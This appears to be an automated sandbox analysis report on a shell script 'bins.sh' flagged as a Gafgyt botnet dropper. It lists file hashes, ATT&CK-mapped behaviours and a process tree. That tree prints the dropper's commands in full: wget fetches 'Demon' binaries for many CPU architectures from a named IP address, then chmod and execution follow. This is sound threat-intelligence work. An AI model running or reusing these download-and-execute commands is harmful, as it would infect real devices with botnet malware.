Analysis
max time kernel: 8s
max time network: 9s
platform: ubuntu-20.04_amd64
resource: ubuntu2004-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu2004-amd64-20240611-en, kernel:5.4.0-169-generic, locale:en-us, os:ubuntu-20.04-amd64, system
submitted: 19-10-2024 11:41
Static task: static1
Behavioral tasks (sample / resource):
- behavioral1: bins.sh / debian12-armhf-20240418-en
- behavioral2: bins.sh / debian12-mipsel-20240729-en
- behavioral3: bins.sh / debian9-armhf-20240611-en
- behavioral4: bins.sh / debian9-mipsbe-20240418-en
- behavioral5: bins.sh / debian9-mipsel-20240611-en
- behavioral6: bins.sh / ubuntu1804-amd64-20240611-en
- behavioral7: bins.sh / ubuntu2004-amd64-20240611-en
- behavioral8: bins.sh / ubuntu2204-amd64-20240611-en
- behavioral9: bins.sh / ubuntu2404-amd64-20240523-en
General
Target: bins.sh
Size: 2KB
MD5: a754f4cf9d6ba2d574cd90bf04d1bc35
SHA1: b0191e89c26057b6132f3314fa685e1879c7dc62
SHA256: bf9fa0c44e56d564d8675f89533c1930b9481597d1f0d09153757d595b8ddaa0
SHA512: 600b970d65a1b8d80e0c7e9808cff50fbb610762a97d619293b859383c85ff671a28793f49d8207c984ffe113c63dabfa66d3df4d922b32c79ce707b3393162f
Malware Config
Signatures
- Detected Gafgyt variant (1 IoCs)
  Processes:
    resource          yara_rule
    /tmp/Demon.mips   family_gafgyt
- File and Directory Permissions Modification (1 TTPs, 14 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  Processes:
    pid   process
    1438  chmod
    1443  chmod
    1471  chmod
    1476  chmod
    1502  chmod
    1448  chmod
    1460  chmod
    1465  chmod
    1487  chmod
    1497  chmod
    1433  chmod
    1482  chmod
    1492  chmod
    1507  chmod
- Executes dropped EXE (1 IoCs)
  Processes:
    ioc               pid   process
    /tmp/Demon.mips   1434  Demon.mips
- Reads system routing table (1 TTPs, 3 IoCs)
  Gets active network interfaces from /proc virtual filesystem.
  Processes:
    description               ioc               process
    File opened for reading   /proc/net/route   Demon.x86
    File opened for reading   /proc/net/route   Demon.i686
    File opened for reading   /proc/net/route   Demon.i586
- Changes its process name (3 IoCs)
  Processes:
    description                                                      pid   process
    Changes the process name, possibly in an attempt to hide itself  1449  Demon.x86
    Changes the process name, possibly in an attempt to hide itself  1466  Demon.i686
    Changes the process name, possibly in an attempt to hide itself  1477  Demon.i586
- Reads system network configuration (1 TTPs, 3 IoCs)
  Uses contents of /proc filesystem to enumerate network settings.
  Processes:
    description               ioc               process
    File opened for reading   /proc/net/route   Demon.x86
    File opened for reading   /proc/net/route   Demon.i686
    File opened for reading   /proc/net/route   Demon.i586
- System Network Configuration Discovery (1 TTPs, 3 IoCs)
  Adversaries may gather information about the network configuration of a system.
  Processes:
    pid   process
    1436  rm
    1393  wget
    1434  Demon.mips
- Writes file to tmp directory (13 IoCs)
  Malware often drops required files in the /tmp directory.
  Processes:
    description                    ioc                 process
    File opened for modification   /tmp/Demon.arm4     wget
    File opened for modification   /tmp/Demon.mips     wget
    File opened for modification   /tmp/Demon.sh4      wget
    File opened for modification   /tmp/Demon.x86      wget
    File opened for modification   /tmp/Demon.arm6     wget
    File opened for modification   /tmp/Demon.i686     wget
    File opened for modification   /tmp/Demon.ppc      wget
    File opened for modification   /tmp/Demon.i586     wget
    File opened for modification   /tmp/Demon.mpsl     wget
    File opened for modification   /tmp/Demon.m68k     wget
    File opened for modification   /tmp/Demon.sparc    wget
    File opened for modification   /tmp/Demon.arm5     wget
    File opened for modification   /tmp/Demon.arm7     wget
Processes (process tree: path, command line, PID; child processes indented under their parent)
/tmp/bins.sh  (/tmp/bins.sh)  PID:1392
  /usr/bin/wget  (wget http://38.123.149.216/Demon.mips)  PID:1393
    - System Network Configuration Discovery
    - Writes file to tmp directory
  /usr/bin/chmod  (chmod +x Demon.mips)  PID:1433
    - File and Directory Permissions Modification
  /tmp/Demon.mips  (./Demon.mips)  PID:1434
    - Executes dropped EXE
    - System Network Configuration Discovery
  /usr/bin/rm  (rm -rf Demon.mips)  PID:1436
    - System Network Configuration Discovery
  /usr/bin/wget  (wget http://38.123.149.216/Demon.mpsl)  PID:1437
    - Writes file to tmp directory
  /usr/bin/chmod  (chmod +x Demon.mpsl)  PID:1438
    - File and Directory Permissions Modification
  /tmp/Demon.mpsl  (./Demon.mpsl)  PID:1439
  /usr/bin/rm  (rm -rf Demon.mpsl)  PID:1441
  /usr/bin/wget  (wget http://38.123.149.216/Demon.sh4)  PID:1442
    - Writes file to tmp directory
  /usr/bin/chmod  (chmod +x Demon.sh4)  PID:1443
    - File and Directory Permissions Modification
  /tmp/Demon.sh4  (./Demon.sh4)  PID:1444
  /usr/bin/rm  (rm -rf Demon.sh4)  PID:1446
  /usr/bin/wget  (wget http://38.123.149.216/Demon.x86)  PID:1447
    - Writes file to tmp directory
  /usr/bin/chmod  (chmod +x Demon.x86)  PID:1448
    - File and Directory Permissions Modification
  /tmp/Demon.x86  (./Demon.x86)  PID:1449
    - Reads system routing table
    - Changes its process name
    - Reads system network configuration
  /usr/bin/rm  (rm -rf Demon.x86)  PID:1452
  /usr/bin/wget  (wget http://38.123.149.216/Demon.arm6)  PID:1453
    - Writes file to tmp directory
  /usr/bin/chmod  (chmod +x Demon.arm6)  PID:1460
    - File and Directory Permissions Modification
  /tmp/Demon.arm6  (./Demon.arm6)  PID:1461
  /usr/bin/rm  (rm -rf Demon.arm6)  PID:1463
  /usr/bin/wget  (wget http://38.123.149.216/Demon.i686)  PID:1464
    - Writes file to tmp directory
  /usr/bin/chmod  (chmod +x Demon.i686)  PID:1465
    - File and Directory Permissions Modification
  /tmp/Demon.i686  (./Demon.i686)  PID:1466
    - Reads system routing table
    - Changes its process name
    - Reads system network configuration
  /usr/bin/rm  (rm -rf Demon.i686)  PID:1469
  /usr/bin/wget  (wget http://38.123.149.216/Demon.ppc)  PID:1470
    - Writes file to tmp directory
  /usr/bin/chmod  (chmod +x Demon.ppc)  PID:1471
    - File and Directory Permissions Modification
  /tmp/Demon.ppc  (./Demon.ppc)  PID:1472
  /usr/bin/rm  (rm -rf Demon.ppc)  PID:1474
  /usr/bin/wget  (wget http://38.123.149.216/Demon.i586)  PID:1475
    - Writes file to tmp directory
  /usr/bin/chmod  (chmod +x Demon.i586)  PID:1476
    - File and Directory Permissions Modification
  /tmp/Demon.i586  (./Demon.i586)  PID:1477
    - Reads system routing table
    - Changes its process name
    - Reads system network configuration
  /usr/bin/rm  (rm -rf Demon.i586)  PID:1480
  /usr/bin/wget  (wget http://38.123.149.216/Demon.m68k)  PID:1481
    - Writes file to tmp directory
  /usr/bin/chmod  (chmod +x Demon.m68k)  PID:1482
    - File and Directory Permissions Modification
  /tmp/Demon.m68k  (./Demon.m68k)  PID:1483
  /usr/bin/rm  (rm -rf Demon.m68k)  PID:1485
  /usr/bin/wget  (wget http://38.123.149.216/Demon.sparc)  PID:1486
    - Writes file to tmp directory
  /usr/bin/chmod  (chmod +x Demon.sparc)  PID:1487
    - File and Directory Permissions Modification
  /tmp/Demon.sparc  (./Demon.sparc)  PID:1488
  /usr/bin/rm  (rm -rf Demon.sparc)  PID:1490
  /usr/bin/wget  (wget http://38.123.149.216/Demon.arm4)  PID:1491
    - Writes file to tmp directory
  /usr/bin/chmod  (chmod +x Demon.arm4)  PID:1492
    - File and Directory Permissions Modification
  /tmp/Demon.arm4  (./Demon.arm4)  PID:1493
  /usr/bin/rm  (rm -rf Demon.arm4)  PID:1495
  /usr/bin/wget  (wget http://38.123.149.216/Demon.arm5)  PID:1496
    - Writes file to tmp directory
  /usr/bin/chmod  (chmod +x Demon.arm5)  PID:1497
    - File and Directory Permissions Modification
  /tmp/Demon.arm5  (./Demon.arm5)  PID:1498
  /usr/bin/rm  (rm -rf Demon.arm5)  PID:1500
  /usr/bin/wget  (wget http://38.123.149.216/Demon.arm7)  PID:1501
    - Writes file to tmp directory
  /usr/bin/chmod  (chmod +x Demon.arm7)  PID:1502
    - File and Directory Permissions Modification
  /tmp/Demon.arm7  (./Demon.arm7)  PID:1503
  /usr/bin/rm  (rm -rf Demon.arm7)  PID:1505
  /usr/bin/wget  (wget http://38.123.149.216/Demon.ppc440fp)  PID:1506
  /usr/bin/chmod  (chmod +x Demon.ppc440fp)  PID:1507
    - File and Directory Permissions Modification
  /tmp/Demon.ppc440fp  (./Demon.ppc440fp)  PID:1508
  /usr/bin/rm  (rm -rf Demon.ppc440fp)  PID:1509
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 211KB
MD5: 455a2acf75de8da6ab7c4d9564cc69f9
SHA1: 9e6016c6581289e685bcd6392bbf0bcf6b1182ff
SHA256: b08dea7aae12f248b7730af3c8f924dd67d3251d78df15a9dfb75e5d961df152
SHA512: a76b00d7f684d762ea9d5fa60d579d70b8bdfe75faedb59baae6ffb676d25d57826cde4a639c0b32dfcc3288a965591e148a489e6259910e3e0dbee90ccadeab